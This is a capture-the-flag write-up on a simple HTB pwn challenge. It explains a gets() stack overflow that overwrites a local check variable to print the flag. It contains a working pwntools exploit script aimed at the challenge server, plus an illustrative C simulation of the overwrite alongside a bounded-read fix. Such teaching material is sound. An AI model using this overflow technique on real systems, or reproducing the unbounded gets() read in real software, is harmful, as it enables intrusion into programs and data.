# Getting Started

This challenge is pretty easy but I just thought I’d explain it in a blog post real quick since I started doing some of the HTB pwn challenges.

# Reverse Engineering

The challenge itself is just a simple gets() buffer overflow. As you can see in the code below, it takes our name via a gets() call.

```c
printf("Hello, good sir!\nMay I have your name? ");
gets(input_buffer);
printf("Hello %s, hope you have a good day!\n", input_buffer);
```

If we check in Ghidra, input_buffer is only 44 bytes, but gets() performs no length check on what it reads, so we can simply write a much larger value into it and spill past the end of the buffer.

```c
char input_buffer[44];
```

However, there is a small check:

```c
if (dead_code == 0x1337bab3) {
    flag_buffer = malloc(0x100);
    flag = open("flag.txt", 0);
    /* the read of the flag into flag_buffer is not shown in this excerpt */
    printf("Pleased to make your acquaintance. Here\'s a small gift: %s\n", flag_buffer);
    close(flag);
}
return 0;
```

As you can see, if we can pass this check, the program reads the flag into a buffer created by malloc() and prints it. However, at the start of the function dead_code is initialised to -0x21523f2d (0xdeadc0d3 as an unsigned 32-bit value), so the check never passes on its own. Not to worry: dead_code is a local on the same stack frame as input_buffer, so our gets() overflow can simply overwrite it with the expected value.

# Exploit

```python
#!/usr/bin/python3
from pwn import *

def main():
    p = remote("138.68.155.238", 32483)
    # 60 bytes of filler reach dead_code, then the value the check expects
    payload  = b'A' * 60
    payload += p32(0x1337bab3)

    p.sendlineafter(b"name? ", payload)
    print(p.recvall().decode(errors="replace"))

if __name__ == "__main__":
    main()
```

So here we send 60 As followed by 0x1337BAB3 (packed with p32()). Because gets() lets us overflow input_buffer, those four bytes land on dead_code, the check passes, and the flag gets printed. Easy.
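As an added illustration of the overwrite described above and of the payload the exploit sends (this is example code, not the challenge binary or the write-up's script), the C program below simulates the gets() overflow against an assumed stack layout that places dead_code 60 bytes past input_buffer, and contrasts it with a bounded read that stops at the end of the buffer. The struct layout, the function names and the clamp inside the unsafe reader are assumptions made for this example.

```c
#include <stdint.h>
#include <string.h>

/* Assumed layout (constructed for this example, not taken from Ghidra):
 * the 44-byte buffer, 16 bytes of other locals, then the 4-byte check
 * variable, so dead_code sits exactly 60 bytes past input_buffer as in
 * the write-up's payload. */
struct frame {
    char input_buffer[44];
    char other_locals[16];
    uint32_t dead_code;
};

#define TARGET_VALUE  0x1337bab3u
#define INITIAL_VALUE 0xdeadc0d3u /* -0x21523f2d as an unsigned 32-bit value */

/* Models gets(): copies every byte the caller supplies, so anything past
 * offset 44 lands on the neighbouring locals. The clamp to sizeof(*f)
 * only keeps this simulation within defined behaviour; gets() has none. */
static void unsafe_read_name(struct frame *f, const char *in, size_t len)
{
    if (len > sizeof *f) len = sizeof *f;
    memcpy(f, in, len);
}

/* Hardened replacement (fgets-style): never writes past the buffer. */
static void safe_read_name(struct frame *f, const char *in, size_t len)
{
    size_t max = sizeof f->input_buffer - 1;
    if (len > max) len = max;
    memcpy(f->input_buffer, in, len);
    f->input_buffer[len] = '\0';
}

/* Builds the write-up's payload (60 filler bytes, then the expected value in
 * host byte order, matching what p32() emits on a little-endian target) and
 * returns 1 if the flag check would pass after the given reader has run. */
int run_scenario(void (*reader)(struct frame *, const char *, size_t))
{
    struct frame f;
    char payload[64];
    uint32_t v = TARGET_VALUE;
    memset(payload, 'A', 60);
    memcpy(payload + 60, &v, sizeof v);
    memset(&f, 0, sizeof f);
    f.dead_code = INITIAL_VALUE;
    reader(&f, payload, sizeof payload);
    return f.dead_code == TARGET_VALUE;
}
```

With the unbounded reader the check flips to true; with the bounded reader dead_code keeps its initial value and the flag branch is never reached.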